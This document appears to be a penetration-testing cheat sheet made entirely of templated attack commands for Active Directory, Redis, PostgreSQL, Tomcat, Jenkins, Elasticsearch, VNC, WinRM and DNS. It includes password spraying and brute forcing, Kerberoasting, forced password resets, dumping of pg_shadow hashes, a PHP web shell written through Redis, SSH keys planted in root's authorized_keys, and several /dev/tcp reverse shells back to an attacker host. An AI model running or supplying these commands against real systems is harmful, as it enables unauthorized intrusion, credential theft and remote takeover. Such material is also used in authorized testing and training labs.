nxc smb {{DC_IP}} -u {{USER}} -p '{{PASS}}' -M change-password -o USER=TARGET_USER NEWPASS=NewP@ss123! impacket-changepasswd '{{DOMAIN}}/TARGET_USER:OldP@ss@{{DC_IP}}' -newpass 'NewP@ss123!' impacket-changepasswd '{{DOMAIN}}/TARGET_USER@{{DC_IP}}' -newpass 'NewP@ss123!' -reset -altuser '{{USER}}' -altpass '{{PASS}}' bloodyAD -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' --host {{DC_IP}} set password TARGET_USER 'NewP@ss123!' nmap -sV -Pn -p 512,513,514 --script rexec-brute,rlogin-brute,rsh-brute {{RHOST}} rlogin -l root {{RHOST}} rsh -l root {{RHOST}} id rexec -l {{USER}} -p {{PASS}} {{RHOST}} id hydra -L {{WORDLIST}} -P {{WORDLIST}} rexec://{{RHOST}} nmap -p 53 -sV -sU -sT {{RHOST}} nmap -p 53 --script dns-nsid,dns-recursion,dns-zone-transfer --script-args dns-zone-transfer.domain={{DOMAIN}} {{RHOST}} dig axfr {{DOMAIN}} @{{RHOST}} dig any {{DOMAIN}} @{{RHOST}} dig ns {{DOMAIN}} @{{RHOST}} +short dig -x {{RHOST}} @{{RHOST}} host -l {{DOMAIN}} {{RHOST}} dnsrecon -d {{DOMAIN}} -n {{RHOST}} -t axfr dnsrecon -d {{DOMAIN}} -n {{RHOST}} -D {{WORDLIST}} -t brt dnsenum --dnsserver {{RHOST}} --enum -f {{WORDLIST}} {{DOMAIN}} gobuster dns -d {{DOMAIN}} -r {{RHOST}} -w {{WORDLIST}} nslookup -type=txt {{DOMAIN}} {{RHOST}} nmap -sV -p {{RPORT}} --script=pgsql-brute {{RHOST}} psql -h {{RHOST}} -p {{RPORT}} -U {{USER}} -W PGPASSWORD='{{PASS}}' psql -h {{RHOST}} -p {{RPORT}} -U postgres -c '\l' hydra -L {{WORDLIST}} -P {{WORDLIST}} {{RHOST}} postgres PGPASSWORD='{{PASS}}' psql -h {{RHOST}} -U {{USER}} -c 'SELECT usename, passwd FROM pg_shadow;' PGPASSWORD='{{PASS}}' psql -h {{RHOST}} -U {{USER}} -c "CREATE TABLE cmd(out text); COPY cmd FROM PROGRAM 'id'; SELECT * FROM cmd;" PGPASSWORD='{{PASS}}' psql -h {{RHOST}} -U {{USER}} -c "COPY cmd FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1\"';" PGPASSWORD='{{PASS}}' psql -h {{RHOST}} -U {{USER}} -c "CREATE TABLE f(d text); COPY f FROM '/etc/passwd'; SELECT * FROM f;" nmap -p 5900 -sV -sC {{RHOST}} nmap -p 5900 --script 
vnc-info,vnc-title,realvnc-auth-bypass {{RHOST}} vncviewer {{RHOST}}::{{RPORT}} vncviewer -passwd vnc.pass {{RHOST}}::{{RPORT}} hydra -P {{WORDLIST}} -t 4 vnc://{{RHOST}}:{{RPORT}} vncpwd {{WORDLIST}} msfconsole -q -x 'use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS {{RHOSTS}}; run; exit' msfconsole -q -x 'use auxiliary/scanner/vnc/vnc_login; set RHOSTS {{RHOSTS}}; set PASS_FILE {{WORDLIST}}; run; exit' nmap -p5985,5986 -sV {{RHOST}} -oN winrm_enum.txt netexec winrm {{RHOST}} -u {{USER}} -p {{PASS}} netexec winrm {{RHOST}} -u {{USER}} -H {{NTHASH}} netexec winrm {{RHOST}} -u {{WORDLIST}} -p {{PASS}} --continue-on-success evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}} evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -S evil-winrm -i {{RHOST}} -c cert.pem -k priv.key -S -u {{USER}} evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -s /opt/scripts/ -e /opt/exes/ upload /home/kali/winPEASx64.exe C:\\Users\\Public\\winpeas.exe impacket-getTGT {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} && KRB5CCNAME={{USER}}.ccache evil-winrm -i {{DC_HOST}} -u {{USER}} -r {{DOMAIN}} LDAPTLS_REQCERT=never ldapsearch -x -H ldaps://{{DC_IP}}:636 -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC={{DOMAIN}}' '(objectClass=user)' sAMAccountName nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --port 636 --users impacket-rbcd -delegate-from 'ATTACKER$' -delegate-to 'TARGET$' -action write -dc-ip {{DC_IP}} '{{DOMAIN}}/{{USER}}:{{PASS}}' certipy shadow auto -u '{{USER}}@{{DOMAIN}}' -p '{{PASS}}' -account 'TARGET' -dc-ip {{DC_IP}} bloodhound-python -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' -ns {{DC_IP}} --use-ldaps -c All --zip openssl s_client -connect {{DC_IP}}:636 -showcerts </dev/null 2>/dev/null | openssl x509 -noout -subject -issuer -dates nmap -sV -p {{RPORT}} --script=redis-info {{RHOST}} redis-cli -h {{RHOST}} -p {{RPORT}} INFO redis-cli -h {{RHOST}} -p {{RPORT}} -a '{{PASS}}' INFO redis-cli -h {{RHOST}} -p {{RPORT}} CONFIG GET dir redis-cli -h 
{{RHOST}} -p {{RPORT}} CONFIG SET dir /var/www/html && redis-cli -h {{RHOST}} -p {{RPORT}} CONFIG SET dbfilename shell.php && redis-cli -h {{RHOST}} -p {{RPORT}} SET x '<?php system($_GET["c"]); ?>' && redis-cli -h {{RHOST}} -p {{RPORT}} SAVE (echo -e '\n\n'; cat {{LHOST}}_key.pub; echo -e '\n\n') > sshkey.txt && redis-cli -h {{RHOST}} -p {{RPORT}} flushall && cat sshkey.txt | redis-cli -h {{RHOST}} -p {{RPORT}} -x set sshkey && redis-cli -h {{RHOST}} -p {{RPORT}} config set dir /root/.ssh && redis-cli -h {{RHOST}} -p {{RPORT}} config set dbfilename authorized_keys && redis-cli -h {{RHOST}} -p {{RPORT}} save redis-cli -h {{RHOST}} -p {{RPORT}} MODULE LOAD /path/to/exp.so && redis-cli -h {{RHOST}} -p {{RPORT}} system.exec 'id' redis-cli -h {{RHOST}} -p {{RPORT}} CONFIG SET dir /var/spool/cron && redis-cli -h {{RHOST}} -p {{RPORT}} CONFIG SET dbfilename root && redis-cli -h {{RHOST}} -p {{RPORT}} SET x '\n* * * * * bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1\n' && redis-cli -h {{RHOST}} -p {{RPORT}} SAVE nmap -sU -p69 -sV {{RHOST}} nmap -sU -p69 --script tftp-enum {{RHOST}} tftp {{RHOST}} tftp {{RHOST}} -c get {{URL}} tftp {{RHOST}} -c put shell.php nmap -sV -p 80,443 --script=http-enum,http-title,http-headers,http-methods {{RHOST}} whatweb -a 3 {{URL}} nikto -h {{URL}} curl -s {{URL}}/robots.txt; curl -s {{URL}}/sitemap.xml feroxbuster -u {{URL}} -w {{WORDLIST}} -x php,txt,html -t 50 ffuf -u {{URL}} -H 'Host: FUZZ.{{DOMAIN}}' -w {{WORDLIST}} -fc 404 openssl s_client -connect {{RHOST}}:{{RPORT}} 2>/dev/null | openssl x509 -noout -text | grep -E 'Subject:|DNS:' wpscan --url {{URL}} --enumerate u,vp,vt --api-token <token> wpscan --url {{URL}} --usernames {{USER}} --passwords {{WORDLIST}} curl -s '{{URL}}/index.php?page=php://filter/convert.base64-encode/resource=index' nmap -sV -p 8080 --script=http-title,http-headers,http-enum {{RHOST}} whatweb {{URL}} feroxbuster -u {{URL}} -w {{WORDLIST}} -t 50 curl -s -u {{USER}}:{{PASS}} {{URL}}/manager/html hydra -L {{WORDLIST}} 
-P {{WORDLIST}} -f {{RHOST}} -s {{RPORT}} http-get /manager/html msfvenom -p java/jsp_shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f war -o shell.war curl -s -u {{USER}}:{{PASS}} -T shell.war '{{URL}}/manager/text/deploy?path=/shell' curl -s {{URL}}/script curl -s -d 'script=def proc=["/bin/bash","-c","bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1"].execute();proc.waitFor()' {{URL}}/scriptText nmap -p873 -sV --script rsync-list-modules {{RHOST}} rsync -av --list-only rsync://{{RHOST}}/ rsync -av --list-only rsync://{{RHOST}}/share_name rsync -av rsync://{{RHOST}}/share_name ./loot rsync -av ./payload rsync://{{RHOST}}/share_name/ rsync -av --port=873 'rsync://{{USER}}@{{RHOST}}/share_name' kerbrute userenum --dc {{DC_IP}} -d {{DOMAIN}} {{WORDLIST}} kerbrute passwordspray --dc {{DC_IP}} -d {{DOMAIN}} {{WORDLIST}} '{{PASS}}' nxc smb {{DC_IP}} -u {{WORDLIST}} -p '{{PASS}}' --no-bruteforce --continue-on-success impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile {{WORDLIST}} -no-pass -format hashcat -outputfile asrep.hashes impacket-GetNPUsers {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -format hashcat -outputfile asrep.hashes impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile kerb.hashes nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --kerberoasting kerb.out nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --asreproast asrep.out Rubeus.exe kerberoast /outfile:kerb.hashes /nowrap Rubeus.exe asreproast /format:hashcat /outfile:asrep.hashes /nowrap sudo ntpdate {{DC_IP}} sudo timedatectl set-ntp off; sudo rdate -n {{DC_IP}} nmap -sV -p {{RPORT}} --script=http-elasticsearch-head {{RHOST}} curl -s http://{{RHOST}}:{{RPORT}}/ curl -s 'http://{{RHOST}}:{{RPORT}}/_cat/indices?v' curl -s 'http://{{RHOST}}:{{RPORT}}/INDEXNAME/_search?pretty&size=1000' curl -s -u {{USER}}:{{PASS}} 'http://{{RHOST}}:{{RPORT}}/_cat/indices?v' curl -s 'http://{{RHOST}}:{{RPORT}}/_search?pretty' -H 'Content-Type: application/json' -d 
'{"size":1,"script_fields":{"x":{"script":{"lang":"groovy","inline":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}}'